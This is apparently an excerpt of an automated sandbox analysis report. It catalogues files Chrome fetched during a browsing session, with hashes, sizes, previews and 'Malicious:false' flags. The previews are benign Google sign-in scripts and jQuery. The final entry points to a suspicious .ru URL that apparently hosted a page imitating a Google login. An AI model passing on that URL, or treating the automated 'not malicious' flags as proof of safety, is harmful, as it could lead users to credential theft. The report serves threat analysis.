                          SHA-256:D843E67FBFA1F5CB0024062861EE26860C5A866F80755CF39B3465459A8538B9
                          SHA-512:19FE62CB9D884BB3424C51DD15E74EB22E5A639BABF8398BACEBB781862296FA0D7AEE39C88CB9C7AF5791FD58830AC3433F5C6BD94B1BA3912AB33151E93452
                          Malicious:false
                          Reputation:unknown
                          URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAmizv7aIHX0ABIFDTcwqTA=?alt=proto
                          Preview:CgkKBw03MKkwGgA=
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:ASCII text, with no line terminators
                          Category:downloaded
                          Size (bytes):84
                          Entropy (8bit):4.8956177273871955
                          Encrypted:false
                          SSDEEP:
                          MD5:C1A63EFB710BA8126E01F66212E8B21D
                          SHA1:A744551CB98A8C0FBF62FA8B2B5CE038D000188F
                          SHA-256:0AE856D22BAACEA48E063E6591A4743AA580E635700B07B8063454E8A082BADC
                          SHA-512:5DF66332997A3FA37639C4354558723072C9FBC886DC3F220A4D2D29637B165A0F81B4D9857403889E88A4C9D0AE52775376434229935B8DF6431C79391E4823
                          Malicious:false
                          Reputation:unknown
                          URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISHgmA6QC9dWevzxIFDRkBE_oSBQ3oIX6GEgUN05ioBw==?alt=proto
                          Preview:Cj0KBw0ZARP6GgAKKQ3oIX6GGgQISxgCKhwIClIYCg5AIS4kI18qLSY/LyslLBABGP////8PCgcN05ioBxoA
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:ASCII text, with very long lines (570)
                          Category:dropped
                          Size (bytes):3476
                          Entropy (8bit):5.504002404391888
                          Encrypted:false
                          SSDEEP:
                          MD5:3117AC50EC5B1F44F54B9502C02A0620
                          SHA1:F688B1361D9E37D19D9F518FE09C99A76E0DE438
                          SHA-256:E44AAC8C2BB2299F6D479A2AAD1903E6DCDDD4CCD8DB5417AC4B47F4AB4C54A5
                          SHA-512:1F0EEECF0F117C80636DBE85E9050CF5D3F376C67CF6AD1C41ACE6C26E17E3E248BC9E71054823AB065DE830F40AC27DFD0B8EC07197D8CB1E0EC66107FBA184
                          Malicious:false
                          Reputation:unknown
                          Preview:"use strict";this.default_AccountsSignInUi=this.default_AccountsSignInUi||{};(function(_){var window=this;.try{._.k("Wt6vjf");.var gya=function(){var a=_.Le();return _.nk(a,1)},wu=function(a){this.Ha=_.u(a,0,wu.messageId)};_.J(wu,_.w);wu.prototype.Fa=function(){return _.ek(this,1)};wu.prototype.Sa=function(a){return _.xk(this,1,a)};wu.messageId="f.bo";var xu=function(){_.gn.call(this)};_.J(xu,_.gn);xu.prototype.Jd=function(){this.hW=!1;hya(this);_.gn.prototype.Jd.call(this)};xu.prototype.aa=function(){iya(this);if(this.mF)return jya(this),!1;if(!this.nY)return yu(this),!0;this.dispatchEvent("p");if(!this.tS)return yu(this),!0;this.LP?(this.dispatchEvent("r"),yu(this)):jya(this);return!1};.var kya=function(a){var b=new _.cg(a.w7);a.qT!=null&&_.hg(b,"authuser",a.qT);return b},jya=function(a){a.mF=!0;var b=kya(a),c="rt=r&f_uid="+_.Sk(a.tS);_.Nn(b,(0,_.Mg)(a.fa,a),"POST",c)};.xu.prototype.fa=function(a){a=a.target;iya(this);if(_.Qn(a)){this.mN=0;if(this.LP)this.mF=!1,this.dispatchEvent("r"
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1136)
                          Category:dropped
                          Size (bytes):1555
                          Entropy (8bit):5.249530958699059
                          Encrypted:false
                          SSDEEP:
                          MD5:FBE36EB2EECF1B90451A3A72701E49D2
                          SHA1:AE56EA57C52D1153CEC33CEF91CF935D2D3AF14D
                          SHA-256:E8F2DED5D74C0EE5F427A20B6715E65BC79ED5C4FC67FB00D89005515C8EFE63
                          SHA-512:7B1FD6CF34C26AF2436AF61A1DE16C9DBFB4C43579A9499F4852A7848F873BAC15BEEEA6124CF17F46A9F5DD632162364E0EC120ACA5F65E7C5615FF178A248F
                          Malicious:false
                          Reputation:unknown
                          Preview:<!DOCTYPE html>.<html lang=en>. <meta charset=utf-8>. <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width">. <title>Error 400 (Bad Request)!!1</title>. <style>. *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//ww
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 1741x979, Suserng: [none]x[none], YUV color, decoders should clamp
                          Category:dropped
                          Size (bytes):106290
                          Entropy (8bit):7.99716969201618
                          Encrypted:true
                          SSDEEP:
                          MD5:428183BFB7C31D8C3BCC985DAC004681
                          SHA1:691AE27C0FC2FE29732BD7C6907F4A9BE9253356
                          SHA-256:B4F40DAF431A5CF056DFFF45E867C8C24D8107505CD46FF17B0F9102E4FE3D2B
                          SHA-512:7E648B56988E9B66FCBE3DA447CEACFAC2A39D43D78604B50085CA3F64C898DDFD81F5C01F4A6854511BCC8845BABA7F8C4EC20974094F7F87AF27E4D1A78003
                          Malicious:false
                          Reputation:unknown
                          Preview:RIFF*...WEBPVP8 .....>...*....>.F.K...,..9A...in.f.Y....... j.........._.)|u.......=.?.....'M.W........c........t........7.'.o.?.{_..@?.z\z.~.{.. .C...W._........}@?..jt......?.?......../..<....._._....G...?........_........_._.................._........G.?.`.Q./..../.....o./.A......?.|.u/.?........s...?.............~.A.{.W....C.q.......?..`?....................y...........|..:.................k.....o..........u..................m.....{.....q..-..f.$M.. E........L'&..^...........<.y+.-.+..5.......b...FTM.c...............JMA...$...`+.x.]... ..7kc|..5....%.x.W{..&4......:.t....;.w@.....t..(.T)a6F........."......%\u...'D..........}..3....F.Lbh.g..g....-....3..%.W9....n.F~5R/5J..ql..~.F.B.LX.+...S.......+.0+c|...F........;.O..i.`..D.ez+uRj.I..9..e..q...;.u.c1.'itl...F....dx..pN......Y...|...&~>Q...o=.1`.)!.d.....A....~......8....Q.E.dj..V.`U...XUQ....o.}..pe%.-..H.....J.7........58.-.....".<..O._..N..;.i..b..1".I.}-...>......f.]...Ue....w.L._.z...
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:ASCII text, with very long lines (522)
                          Category:dropped
                          Size (bytes):5046
                          Entropy (8bit):5.318458707808428
                          Encrypted:false
                          SSDEEP:
                          MD5:11A0FE539B70E1496F1CDE708780AC28
                          SHA1:CA93A039A1984324FA00CFC1D47485A08C246BA0
                          SHA-256:0A657B0B087379B6A9EB5E17486D1CF4A56B68FB04F6BFF01E03798C17B3D186
                          SHA-512:07081BE0F91078A8C187203268AB0789372D0FF5F1735CC4A5E6784AD67DB145E8E5B303D6BFC5A68C4B189DADFEF5BFC95D40922513D0FD1AF31A17B6C1B0F6
                          Malicious:false
                          Reputation:unknown
                          Preview:"use strict";this.default_AccountsSignInUi=this.default_AccountsSignInUi||{};(function(_){var window=this;.try{._.EOa=_.z("wg1P6b",[_.RB,_.fy,_.Ao]);._.k("wg1P6b");.var y8a;y8a=_.Nh(["aria-"]);._.EG=function(a){_.W.call(this,a.La);this.Ma=this.Ba=this.aa=this.viewportElement=this.Pa=null;this.Zc=a.Ga.If;this.eb=a.Ga.focus;this.Mc=a.Ga.Mc;this.fa=this.Lj();a=-1*parseInt(_.np(this.Lj().el(),"marginTop")||"0",10);var b=parseInt(_.np(this.Lj().el(),"marginBottom")||"0",10);this.Wa={top:a,right:0,bottom:b,left:0};a=_.pf(this.getData("isMenuDynamic"),!1);b=_.pf(this.getData("isMenuHoisted"),!1);this.Ea=a?1:b?2:0;this.oa=!1;this.Da=1;this.Ea!==1&&(this.aa=this.Ta("U0exHf").children().Tc(0),this.Kj(z8a(this,.this.aa.el())));_.CD(this.Aa())&&(a=this.Aa().el(),b=this.Ne.bind(this),a.__soy_skip_handler=b)};_.J(_.EG,_.W);_.EG.Ca=function(){return{Ga:{If:_.rD,focus:_.gD,Mc:_.Pu}}};_.EG.prototype.nA=function(a){var b=a.source;this.Pa=b;var c;((c=a.data)==null?0:c.rB)?(a=a.data.rB,this.Da=a==="MOUSE"
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:ASCII text, with very long lines (65447)
                          Category:downloaded
                          Size (bytes):89501
                          Entropy (8bit):5.289893677458563
                          Encrypted:false
                          SSDEEP:
                          MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                          SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                          SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                          SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                          Malicious:false
                          Reputation:unknown
                          URL:https://code.jquery.com/jquery-3.6.0.min.js
                          Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:ASCII text, with very long lines (469)
                          Category:dropped
                          Size (bytes):2028
                          Entropy (8bit):5.306253423005373
                          Encrypted:false
                          SSDEEP:
                          MD5:17D898BDDED0838E2FAFB91DC06BEC1C
                          SHA1:99919F30F71456FA2DEEC1F34F84843EA517482F
                          SHA-256:A244D72BF1FF5E751A7CC415DC36805B047B25A84D239D7DE46DC4E4A6ADBBAB
                          SHA-512:BF185886CCB46942014A8B2F1863A56D4E8251C3FA25191401A963B78FA0C6D2ECC4B0F862EE8C67A8B0FEFBB8E6121EEBBE67E05F98E6CDB11195C936657AF5
                          Malicious:false
                          Reputation:unknown
                          Preview:"use strict";this.default_AccountsSignInUi=this.default_AccountsSignInUi||{};(function(_){var window=this;.try{._.k("iAskyc");._.LX=function(a){_.Ct.call(this);this.window=a.Ga.window.get();this.uc=a.Ga.uc};_.J(_.LX,_.Fu);_.LX.Ca=function(){return{Ga:{window:_.Ou,uc:_.$C}}};_.LX.prototype.wq=function(){};_.LX.prototype.addEncryptionRecoveryMethod=function(){};_.MX=function(a){return(a==null?void 0:a.pq)||function(){}};_.NX=function(a){return(a==null?void 0:a.I5)||function(){}};_.iXb=function(a){return(a==null?void 0:a.Vq)||function(){}};._.jXb=function(a){return new Map(Array.from(a,function(b){var c=_.n(b);b=c.next().value;c=c.next().value;return[b,c.map(function(d){return{epoch:d.epoch,key:new Uint8Array(d.key)}})]}))};_.kXb=function(a){setTimeout(function(){throw a;},0)};_.LX.prototype.dR=function(){return!0};_.OX=function(a,b,c,d){c=c===void 0?"":c;a=a.uc;var e=a.YQ,f=new _.SC;b=_.Nj(f,7,_.DWa,b==null?b:_.Tc(b));e.call(a,305,b,d,void 0,void 0,_.bWb(new _.RC,_.aWb(new _.iX,c)))};_.K
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:ASCII text, with very long lines (5693)
                          Category:downloaded
                          Size (bytes):719516
                          Entropy (8bit):5.592174977343808
                          Encrypted:false
                          SSDEEP:
                          MD5:938E1C4958C8FFEB83B95C2C1DD741B3
                          SHA1:99EE194F3FD0EC0672B47E33510A42AE2E18F33E
                          SHA-256:5A0474A65C3FA773701D08BE8518D3E94BBFABDD20687E7441236B6B8CEFC1BC
                          SHA-512:0ED6BA7D4D63C5E68D0FBE9C08CD0024FE1236FFA6A80260257E506AF4843A6D37D74721D76003A77B4D2E995B54AD7954586F8EC29A93F52491A2FF14C58E7C
                          Malicious:false
                          Reputation:unknown
                          URL:"https://www.gstatic.com/_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en_US.o-xrRUOsnJg.es5.O/ck=boq-identity.AccountsSignInUi.0kxUC5tMpvM.L.B1.O/am=iQ2mZPgGABD_cGlAN6BIIGQAAAAAAAAAAMAGAACwww/d=1/exm=LEikZe,_b,_tp,byfTOb,lsjVmc/excm=_b,_tp,identifierview/ed=1/wt=2/ujg=1/rs=AOaEmlHWF9YibrbVxyqBWgCA7Xrwdn4pxw/ee=ASJRFf:DAnQ7e;Al0B8:kibjWe;DaIJ8c:iAskyc;EVNhjf:pw70Gc;EkYFhd:GwYlN;EmZ2Bf:zr1jrb;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:XVMNvd;Me32dd:MEeYgc;NPKaK:PVlQOd;NSEoX:lazG7b;Pjplud:EEDORb;QGR0gd:Mlhmy;SMDL4c:K0PMbc;SNUn3:ZwDk9d;ScI3Yc:e7Hzgb;UpnZUd:nnwwYc;Uvc8o:VDovNc;XdiAjb:NLiXbe;YIZmRd:A1yn5d;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;dowIGb:ebZ3mb;eBAeSb:zbML3c;iFQyKf:vfuNJf;lOO0Vd:OTA3Ae;nAFL3:NTMZac;nTuGK:JKNPM;oGtAuc:sOXFj;oSUNyd:K0PMbc;oXZmbc:tUnxGc;pXdRYb:L9OGUe;qafBPd:yDVVkb;qddgKe:xQtZb;vNjB7d:YTxL4;wR5FRb:siKnQd;yxTchf:KUM7Z/m=n73qwf,SCuOPb,IZT63,vfuNJf,UUJqVe,ws9Tlc,siKnQd,cciGGe,m9oV,vjKJJ,y5vRwf,K1ZKnb,ziZ8Mc,b3kMqb,mvkUhe,CMcBD,Fndnac,t2srLd,EN3i8d,z0u0L,xiZRqc,L9OGUe,PrPYRd,MpJwZc,cYShmd,hc6Ubd,Rkm0ef,KUM7Z,WpP9Yc,lwddkf,SpsfSb,aC1iue,EFQ78c,xQtZb,zbML3c,zr1jrb,vHEMJe,YHI3We,YTxL4,Uas9Hd,zy0vNb,K0PMbc,qmdT9,LDQI"
                          Preview:"use strict";_F_installCss(".r4WGQb{position:relative}.Dl08I>:first-child{margin-top:0}.Dl08I>:last-child{margin-bottom:0}.IzwVE{color:#1f1f1f;color:var(--gm3-sys-color-on-surface,#1f1f1f);font-family:\"Google Sans\",roboto,\"Noto Sans Myanmar UI\",arial,sans-serif;font-size:1.25rem;font-weight:400;letter-spacing:0rem;line-height:1.2}.l5PPKe{color:#1f1f1f;color:var(--gm3-sys-color-on-surface,#1f1f1f);font-size:1rem}.l5PPKe .dMNVAe{margin:0;padding:0}.l5PPKe>:first-child{margin-top:0;padding-top:0}.l5PPKe>:last-child{margin-bottom:0;padding-bottom:0}.Dl08I{margin:0;padding:0;position:relative}.Dl08I>.SmR8:only-child{padding-top:1px}.Dl08I>.SmR8:only-child::before{top:0}.Dl08I>.SmR8:not(first-child){padding-bottom:1px}.Dl08I>.SmR8::after{bottom:0}.Dl08I>.SmR8:only-child::before,.Dl08I>.SmR8::after{border-bottom:1px solid #c4c7c5;border-bottom:1px solid var(--gm3-sys-color-outline-variant,#c4c7c5);content:\"\";height:0;left:0;position:absolute;width:100%}.aZvCDf{margin-top:8px;margin-left
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:very short file (no magic)
                          Category:dropped
                          Size (bytes):1
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:
                          MD5:C4CA4238A0B923820DCC509A6F75849B
                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                          Malicious:false
                          Reputation:unknown
                          Preview:1
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:ASCII text, with very long lines (680)
                          Category:downloaded
                          Size (bytes):3125
                          Entropy (8bit):5.394440798443387
                          Encrypted:false
                          SSDEEP:
                          MD5:DA3E4DEB7EC8F58A8E9812ADC8B4B288
                          SHA1:61486EC8E1077D69A6B72A0A26A40FB7E2DE62F3
                          SHA-256:692C473425D01421773A5B2531A43BC3DA724655B1C8EDF626D1DC58E49842E1
                          SHA-512:C0DD7E0F40D5B65D00605D0B9E59CFCB79C1541B52B86243D29B32DD660E2D63CF51E2BFBCF1243447C6F4130A8C9C9B01E885D665C9F9EC81E97BE8226A0208
                          Malicious:false
                          Reputation:unknown
                          URL:"https://www.gstatic.com/_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en_US.o-xrRUOsnJg.es5.O/ck=boq-identity.AccountsSignInUi.0kxUC5tMpvM.L.B1.O/am=iQ2mZPgGABD_cGlAN6BIIGQAAAAAAAAAAMAGAACwww/d=1/exm=CMcBD,E87wgc,EFQ78c,EN3i8d,Fndnac,IZT63,K0PMbc,K1ZKnb,KUM7Z,L9OGUe,LDQI,LEikZe,LvGhrf,MpJwZc,PHUIyb,PrPYRd,Rkm0ef,RqjULd,SCuOPb,SD8Jgb,SpsfSb,Tbb4sb,UUJqVe,Uas9Hd,WpP9Yc,YHI3We,YTxL4,YgOFye,_b,_tp,aC1iue,b3kMqb,bTi8wc,byfTOb,cYShmd,cciGGe,f8Gu1e,hc6Ubd,lsjVmc,ltDFwf,lwddkf,m9oV,mvkUhe,n73qwf,oqkvIf,p3hmRc,pxq3x,qPYxq,qmdT9,rmumx,siKnQd,soHxf,t2srLd,vHEMJe,vfuNJf,vjKJJ,ws9Tlc,xQtZb,xiZRqc,y5vRwf,yRXbo,ywOR5c,z0u0L,zbML3c,ziZ8Mc,zr1jrb,zy0vNb/excm=_b,_tp,identifierview/ed=1/wt=2/ujg=1/rs=AOaEmlHWF9YibrbVxyqBWgCA7Xrwdn4pxw/ee=ASJRFf:DAnQ7e;Al0B8:kibjWe;DaIJ8c:iAskyc;EVNhjf:pw70Gc;EkYFhd:GwYlN;EmZ2Bf:zr1jrb;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:XVMNvd;Me32dd:MEeYgc;NPKaK:PVlQOd;NSEoX:lazG7b;Pjplud:EEDORb;QGR0gd:Mlhmy;SMDL4c:K0PMbc;SNUn3:ZwDk9d;ScI3Yc:e7Hzgb;UpnZUd:nnwwYc;Uvc8o:VDovNc;XdiAjb:NLiXbe;YIZmRd:A1yn5d;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;dowIGb:ebZ3mb;eBAeSb:zbML3c;iFQyKf:vfuNJf;lOO0Vd:OTA3Ae;nAFL3:NTMZac;nTuGK:JKNPM;oGtAuc:sOXFj;oSUNyd:K0PMbc;oXZmbc:tUnxGc;pXdRYb:L9OGUe;qafBPd:yDVVkb;qddgKe:xQtZb;vNjB7d:YTxL4;wR5FRb:siKnQd;yxTchf:KUM7Z/m=ZwDk9d,RMhBfe"
                          Preview:"use strict";this.default_AccountsSignInUi=this.default_AccountsSignInUi||{};(function(_){var window=this;.try{._.k("ZwDk9d");.var $A=function(){_.Ct.call(this)};_.J($A,_.Fu);$A.Ca=_.Fu.Ca;$A.prototype.XU=function(a){return _.hf(this,{Ya:{OV:_.Ul}}).then(function(b){var c=window._wjdd,d=window._wjdc;return!c&&d?new _.Ii(function(e){window._wjdc=function(f){d(f);e(GKa(f,b,a))}}):GKa(c,b,a)})};var GKa=function(a,b,c){return(a=a&&a[c])?a:b.Ya.OV.XU(c)};.$A.prototype.aa=function(a,b){var c=_.$ra(b).Jl;if(c.startsWith("$")){var d=_.fn.get(a);_.Dq[b]&&(d||(d={},_.fn.set(a,d)),d[c]=_.Dq[b],delete _.Dq[b],_.Eq--);if(d)if(a=d[c])b=_.nf(a);else throw Error("Yb`"+b);else b=null}else b=null;return b};_.Ku(_.dga,$A);._.l();._.k("SNUn3");._.FKa=new _.Cf(_.Pg);._.l();._.k("RMhBfe");.var HKa=function(a){var b=_.Cq(a);return b?new _.Ii(function(c,d){var e=function(){b=_.Cq(a);var f=_.kga(a,b);f?c(f.getAttribute("jsdata")):window.document.readyState=="complete"?(f=["Unable to find deferred jsdata with i
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:ASCII text, with very long lines (1694)
                          Category:dropped
                          Size (bytes):33478
                          Entropy (8bit):5.3880779097579365
                          Encrypted:false
                          SSDEEP:
                          MD5:32138EFBA0981F05C117F2DFB8728BAF
                          SHA1:C9D2ADC70E99B4601DF991C60096308463A803F5
                          SHA-256:8F8844CBEB7760AEE82E819DD5A396D4BAF49DC01B67FABD09E5D97AB1F5D67D
                          SHA-512:DDBB128C00958314AD02CFCF949A1801F91FC1C26181FCA8B37417E5ABE80359FD4A36A9A55731921C33D8BCC2ED7BEF3B67584F4C044526534F10EF03496FA6
                          Malicious:false
                          Reputation:unknown
                          Preview:"use strict";this.default_AccountsSignInUi=this.default_AccountsSignInUi||{};(function(_){var window=this;.try{.var vua=function(a,b){this.da=a;this.fa=b;if(!c){var c=new _.cg("//www.google.com/images/cleardot.gif");_.Im(c)}this.oa=c};_.h=vua.prototype;_.h.qd=null;_.h.E0=1E4;_.h.pC=!1;_.h.nT=0;_.h.xM=null;_.h.wX=null;_.h.setTimeout=function(a){this.E0=a};_.h.start=function(){if(this.pC)throw Error("vc");this.pC=!0;this.nT=0;wua(this)};_.h.stop=function(){xua(this);this.pC=!1};.var wua=function(a){a.nT++;navigator!==null&&"onLine"in navigator&&!navigator.onLine?_.kn((0,_.Mg)(a.JJ,a,!1),0):(a.aa=new Image,a.aa.onload=(0,_.Mg)(a.Tma,a),a.aa.onerror=(0,_.Mg)(a.Sma,a),a.aa.onabort=(0,_.Mg)(a.Rma,a),a.xM=_.kn(a.Uma,a.E0,a),a.aa.src=String(a.oa))};_.h=vua.prototype;_.h.Tma=function(){this.JJ(!0)};_.h.Sma=function(){this.JJ(!1)};_.h.Rma=function(){this.JJ(!1)};_.h.Uma=function(){this.JJ(!1)};._.h.JJ=function(a){xua(this);a?(this.pC=!1,this.da.call(this.fa,!0)):this.nT<=0?wua(this):(this.pC=!1,
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:ASCII text, with very long lines (372)
                          Category:downloaded
                          Size (bytes):1566
                          Entropy (8bit):5.268657721537838
                          Encrypted:false
                          SSDEEP:
                          MD5:202665412B5F84D902E8426866C79EE2
                          SHA1:04072064D2EE2E3456B0E3D2FCE91476C26A8035
                          SHA-256:F72BD04AAC7931C2B3EC753C270FEA32A73E52AEB24628D526097CCAC49BC8C2
                          SHA-512:77A0DE1632A911362FD5C8F554BC6346611F3C326701D157B1934669C10B0C77EC37941F4C5F4B6CCE47DEC966DFB879AE705F96F0140C128B21788035BCA646
                          Malicious:false
                          Reputation:unknown
                          URL:"https://www.gstatic.com/_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en_US.o-xrRUOsnJg.es5.O/ck=boq-identity.AccountsSignInUi.0kxUC5tMpvM.L.B1.O/am=iQ2mZPgGABD_cGlAN6BIIGQAAAAAAAAAAMAGAACwww/d=1/exm=CMcBD,E87wgc,EFQ78c,EN3i8d,Fndnac,IZT63,K0PMbc,K1ZKnb,KUM7Z,L9OGUe,LDQI,LEikZe,LvGhrf,MpJwZc,PHUIyb,PrPYRd,RMhBfe,Rkm0ef,RqjULd,SCuOPb,SD8Jgb,SpsfSb,Tbb4sb,UUJqVe,Uas9Hd,WpP9Yc,YHI3We,YTxL4,YgOFye,ZwDk9d,_b,_tp,aC1iue,b3kMqb,bTi8wc,byfTOb,cYShmd,cciGGe,f8Gu1e,hc6Ubd,lsjVmc,ltDFwf,lwddkf,m9oV,mvkUhe,n73qwf,oqkvIf,p3hmRc,pxq3x,qPYxq,qmdT9,rmumx,siKnQd,soHxf,t2srLd,vHEMJe,vfuNJf,vjKJJ,ws9Tlc,xQtZb,xiZRqc,y5vRwf,yRXbo,ywOR5c,z0u0L,zbML3c,ziZ8Mc,zr1jrb,zy0vNb/excm=_b,_tp,identifierview/ed=1/wt=2/ujg=1/rs=AOaEmlHWF9YibrbVxyqBWgCA7Xrwdn4pxw/ee=ASJRFf:DAnQ7e;Al0B8:kibjWe;DaIJ8c:iAskyc;EVNhjf:pw70Gc;EkYFhd:GwYlN;EmZ2Bf:zr1jrb;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:XVMNvd;Me32dd:MEeYgc;NPKaK:PVlQOd;NSEoX:lazG7b;Pjplud:EEDORb;QGR0gd:Mlhmy;SMDL4c:K0PMbc;SNUn3:ZwDk9d;ScI3Yc:e7Hzgb;UpnZUd:nnwwYc;Uvc8o:VDovNc;XdiAjb:NLiXbe;YIZmRd:A1yn5d;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;dowIGb:ebZ3mb;eBAeSb:zbML3c;iFQyKf:vfuNJf;lOO0Vd:OTA3Ae;nAFL3:NTMZac;nTuGK:JKNPM;oGtAuc:sOXFj;oSUNyd:K0PMbc;oXZmbc:tUnxGc;pXdRYb:L9OGUe;qafBPd:yDVVkb;qddgKe:xQtZb;vNjB7d:YTxL4;wR5FRb:siKnQd;yxTchf:KUM7Z/m=ZDZcre,w9hDv,A7fCU"
                          Preview:"use strict";this.default_AccountsSignInUi=this.default_AccountsSignInUi||{};(function(_){var window=this;.try{._.k("lOO0Vd");._.j0a=new _.Cf(_.fma);._.l();._.k("ZDZcre");.var b1a=function(){this.Po=_.Iu(_.SE);this.C6=_.Iu(_.j0a);this.aa=_.Iu(_.RE)};b1a.prototype.execute=function(a){var b=this;a=this.aa.create(a);return _.Fb(a,function(c){var d=b.C6.getType(c.Yd())===2?b.Po.Ob(c):b.Po.fetch(c);return _.jm(c,_.TE)?d.then(function(e){return _.Ld(e)}):d},this)};_.Lu(b1a,_.hma);._.l();._.k("w9hDv");._.Og(_.Yla);_.YA=function(a){_.Ct.call(this);this.aa=a.Ya.cache};_.J(_.YA,_.Fu);_.YA.Ca=function(){return{Ya:{cache:_.wt}}};_.YA.prototype.execute=function(a){_.Fb(a,function(b){var c;_.mf(b)&&(c=b.ib.hc(b.nb));c&&this.aa.qJ(c)},this);return{}};_.Ku(_.dma,_.YA);._.l();._.k("K5nYTd");._.i0a=new _.Cf(_.ema);._.l();._.k("sP4Vbe");.._.l();._.k("kMFpHd");.._.l();._.k("A7fCU");.var m0a=function(a){_.Ct.call(this);this.aa=a.Ga.Lga};_.J(m0a,_.Fu);m0a.Ca=function(){return{Ga:{Lga:_.i0a,metadata:_.j0a},p
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:HTML document, ASCII text, with very long lines (65365), with CRLF line terminators
                          Category:downloaded
                          Size (bytes):446749
                          Entropy (8bit):3.1201775449217615
                          Encrypted:false
                          SSDEEP:
                          MD5:15294545BCA76BA42AA41E2A16C9C28C
                          SHA1:5F071B942E465EC67A205F3A563AE158F332EACF
                          SHA-256:DC1F125551EC568E1A5F8DB8029E05A0D71C33CBDF360A060DCCD7C347E4EF66
                          SHA-512:21BBF485D8027D3C76CC9A93292AF6427188F053D09B419A71962A83E35512159E340D386D0F2770F3676A776BF74D711B556574A346CE8C7E72C10C4647306F
                          Malicious:false
                          Reputation:unknown
                          URL:https://8fi5.veracidep.ru/9rQQ7pYZ/
